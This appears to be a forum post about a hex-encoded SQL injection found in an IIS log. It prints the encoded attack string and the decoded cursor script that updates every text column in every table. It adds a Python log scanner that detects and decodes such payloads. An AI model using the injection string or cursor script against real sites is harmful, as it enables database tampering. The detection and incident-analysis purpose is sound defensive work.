We had the same problem on 25 September. I found a SQL injection in the IIS log:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564152434841522832353529220.............%20AS%20VARCHAR(4000));EXEC(@S)
I converted this text from HEX format. Look:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=LEFT(CONVERT(VARCHAR(4000),['+@C+']),PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))-1) WHERE PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))>0')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
The attack came from 41.196.146.57.
Information about this IP:
Hostname: host-41-196-146-57.static.link.com.eg
ISP: Link Egypt
Organization: Link Egypt
Proxy: None detected
Type: Unknown
Geo-Location Information
Country: Egypt
State/Region: 11
City: Cairo
Latitude: 30.05
Longitude: 31.25
This IP is listed in many blacklists (e.g. dnsbl-3.uceprotect.net, cbl.abuseat.org).
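The poster found the payload by reading the IIS log by hand and decoding the hex literal. The script below is an added example (not the poster's code) that automates that triage step: it parses IIS W3C log lines, spots the CAST(0x... AS VARCHAR) idiom in the query string, decodes the hex back to T-SQL, and flags the keywords typical of a cursor-driven mass UPDATE. The log lines and the field header are constructed for the example, and the hex literal is built from a harmless statement so the decode path runs offline; the keyword list and the `#Fields:` names are assumptions based on the standard W3C extended format, not values from the post.

```python
"""Find hex-encoded T-SQL payloads in IIS W3C log lines and decode them."""
import re
from urllib.parse import unquote_plus

# The CAST(0x.... AS VARCHAR/NVARCHAR) idiom that hides the real statement.
# Only the hex digits are required, so a line truncated by the log writer still matches.
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)

# Keywords whose presence in a decoded payload marks a cursor-driven mass update
# (assumed list for this example; extend it to match your own environment).
SUSPECT_KEYWORDS = ("DECLARE", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "EXEC(", "UPDATE")


def decode_hex_literal(hex_digits: str) -> str:
    """Turn the digits of a 0x... literal into text.

    An odd digit count means the log line was cut off; the dangling nibble is dropped.
    NVARCHAR payloads are UTF-16LE (every second byte is 0x00); VARCHAR payloads are
    single-byte and are decoded as latin-1 so no byte value can raise.
    """
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def parse_w3c(lines):
    """Yield one dict per data line, keyed by the most recent #Fields: header."""
    fields = []
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def scan_iis_log(lines):
    """Return one finding per request whose query string carries a hex-encoded statement."""
    findings = []
    for rec in parse_w3c(lines):
        query = unquote_plus(rec.get("cs-uri-query", ""))
        match = HEX_CAST.search(query)
        if not match:
            continue
        decoded = decode_hex_literal(match.group(1))
        hits = [kw for kw in SUSPECT_KEYWORDS if kw in decoded.upper()]
        findings.append({
            "client_ip": rec.get("c-ip", "?"),
            "uri": rec.get("cs-uri-stem", "?"),
            "decoded": decoded,
            "keywords": hits,
        })
    return findings


# Constructed sample log (not the poster's data). The hex literal is generated from a
# harmless statement here so the example decodes it offline; 198.51.100.x are
# documentation addresses, not real clients.
SAMPLE_STATEMENT = "DECLARE @T VARCHAR(255);EXEC('UPDATE demo SET col=1')"
SAMPLE_HEX = SAMPLE_STATEMENT.encode("ascii").hex().upper()
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status",
    "2008-09-25 10:15:01 192.0.2.10 GET /default.asp id=3 80 198.51.100.7 Mozilla/4.0 200",
    "2008-09-25 10:15:02 192.0.2.10 GET /news.asp id=3;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_HEX + "%20AS%20VARCHAR(4000));EXEC(@S) 80 198.51.100.9 Mozilla/4.0 500",
]

if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding["client_ip"], finding["uri"], finding["keywords"])
        print("  ", finding["decoded"])
```

Point the script at a real log by replacing SAMPLE_LOG with `open(path)`; the `#Fields:` header is read from the file, so any column order works as long as the log includes cs-uri-query and c-ip. Truncated hex, as in the post's own log line, still decodes as far as the log kept it.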